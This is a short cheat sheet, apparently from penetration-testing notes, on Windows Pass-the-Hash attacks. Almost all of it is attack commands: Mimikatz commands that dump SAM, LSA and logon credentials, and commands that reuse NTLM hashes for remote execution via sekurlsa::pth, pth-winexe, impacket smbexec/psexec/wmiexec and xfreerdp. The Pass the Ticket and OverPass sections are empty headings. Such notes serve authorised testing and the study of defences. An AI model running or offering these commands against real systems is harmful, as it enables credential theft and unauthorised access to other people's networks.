Pass The Hash
Pass the Hash
lsadump::sam
lsadump::lsa /inject /name:<user>
sekurlsa::logonpasswordsExploit
sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<NTLM or :NT> /run:<cmd>pth-winexe -U <domain>/<user>%<NTLM> //<target ip> cmd
#impacket
python smbexec.py <user>@<ip> -hashes <NTLM or :NT>
python psexec.py <user>@<ip> -hashes <NTLM or :NT>
python wmiexec.py <user>@<ip> -hashes <NTLM or :NT>
#rdp
xfreerdp /u:Administrator /pth:<ntlm> /d:<domain> /v:<target>Pass the Ticket
Exploit
OverPass the Hash / Pass the Key
Exploit
Last updated